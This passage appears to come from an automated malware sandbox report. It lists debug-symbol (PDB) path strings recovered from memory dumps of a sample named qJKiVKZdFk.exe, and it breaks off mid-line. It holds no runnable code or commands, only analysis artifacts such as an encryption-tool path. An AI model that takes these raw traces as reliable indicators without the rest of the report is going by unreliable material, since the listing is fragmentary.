            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\ source: qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1893229623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894415896.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895434021.00000000033AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\* source: qJKiVKZdFk.exe, 00000006.00000003.1426844364.0000000003170000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\jW source: qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893835216.0000000003331000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895058945.0000000003354000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893453557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: qJKiVKZdFk.exe, 00000006.00000003.1988116546.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970773015.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\leveyezazolec cafuvi_21.pdb source: qJKiVKZdFk.exe, 00000000.00000002.1210556297.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000000.00000000.1204142852.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000002.00000000.1207754715.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000005.00000002.1241940715.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000005.00000000.1234443220.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1352556517.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000000.1237625496.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 0000001F.00000000.1473889075.0000000000411000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\7X8i+ source: qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1984945537.0000000003626000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\`K source: qJKiVKZdFk.exe, 00000006.00000003.1912241580.00000000036A2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892669784.000000000362C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1906239278.0000000003409000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893166302.0000000003409000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913784424.0000000003410000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905966303.0000000003342000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\6\ source: qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\okies\F source: qJKiVKZdFk.exe, 00000006.00000003.1988116546.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: qJKiVKZdFk.exe, 00000006.00000003.1967923410.000000000338D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967480425.0000000003308000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: qJKiVKZdFk.exe
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1948134617.00000000034EF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1949224484.000000000355B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1950136140.000000000362B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948942688.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1944400826.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948262731.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1927157486.000000000354F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000362B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\we\ source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\s\Micr source: qJKiVKZdFk.exe, 00000006.00000003.1485860716.000000000312B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\" source: qJKiVKZdFk.exe, 00000006.00000003.1551027154.000000000316D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1439917837.0000000003168000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485598960.0000000003152000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\Temp\.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1944400826.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1947978051.00000000036AD000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1971625636.000000000369C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970280763.000000000368D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\c source: qJKiVKZdFk.exe, 00000006.00000003.1485423577.00000000033B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\g` source: qJKiVKZdFk.exe, 00000006.00000003.1426844364.0000000003170000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qJKiVKZdFk.exe, 00000006.00000003.1337962909.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\tate\ source: qJKiVKZdFk.exe, 00000006.00000003.1820851126.000000000314E000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1822028056.0000000003151000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1822181040.000000000315A000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485598960.0000000003152000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\]H source: qJKiVKZdFk.exe, 00000006.00000003.1912241580.00000000036A2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892669784.000000000362C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\he\ source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: qJKiVKZdFk.exe, 00000006.00000003.1551083347.000000000313D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893357423.000000000313F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485860716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1822460811.000000000313F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: qJKiVKZdFk.exe, 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1551083347.000000000313D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820851126.000000000314E000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485860716.0000000003135000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1968989849.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987568231.0000000003741000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1966872364.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1985741698.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987322234.0000000003732000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: qJKiVKZdFk.exe, 00000006.00000003.1930983614.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913718780.0000000003623000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1912344171.0000000003614000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1929959583.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000357F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\mp\ source: qJKiVKZdFk.exe, 00000006.00000003.1950136140.000000000362B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948942688.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1944400826.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948262731.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000362B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\1' source: qJKiVKZdFk.exe, 00000006.00000003.1893698935.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894472590.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894820733.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893025581.000000000359B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1968989849.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1966872364.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1985741698.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\Temp\.pdb> source: qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893835216.0000000003331000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895058945.0000000003354000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893453557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\pData\ source: qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\mp\y\ source: qJKiVKZdFk.exe, 00000006.00000003.1984677357.000000000313F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\y\\HR source: qJKiVKZdFk.exe, 00000006.00000003.1988116546.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ngs\j source: qJKiVKZdFk.exe, 00000006.00000003.1895972920.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1821139434.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893524746.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894099107.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1821342855.00000000032E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\AC\ source: qJKiVKZdFk.exe, 00000006.00000003.1948815089.0000000003261000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970106720.0000000003280000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1968303351.0000000003279000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s\ source: qJKiVKZdFk.exe, 00000006.00000003.1981634887.0000000003308000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: qJKiVKZdFk.exe, 00000006.00000003.1986500910.0000000003B21000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1983244981.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986448988.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986375047.0000000003644000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\- source: qJKiVKZdFk.exe, 00000006.00000003.1948815089.0000000003261000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970106720.0000000003280000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1968303351.0000000003279000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\V source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ek source: qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913718780.0000000003623000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1912344171.0000000003614000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\5 source: qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550839273.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550986093.00000000032D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1926192275.0000000003771000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905377607.0000000003742000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1820851126.000000000314E000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893025581.000000000359B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894660851.000000000359C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\n source: qJKiVKZdFk.exe, 00000006.00000003.1930983614.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1929959583.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000357F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1968989849.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987568231.0000000003741000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1966872364.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1985741698.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987322234.0000000003732000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ta\ source: qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550839273.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550986093.00000000032D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\} source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\* source: qJKiVKZdFk.exe, 00000006.00000003.1930711412.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894000882.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1946657694.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550839273.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895972920.00000000032F4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981908169.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913945899.00000000032F4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905966303.00000000032D9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1927966188.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1906794585.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550986093.00000000032D9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1988332820.00000000032F5000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 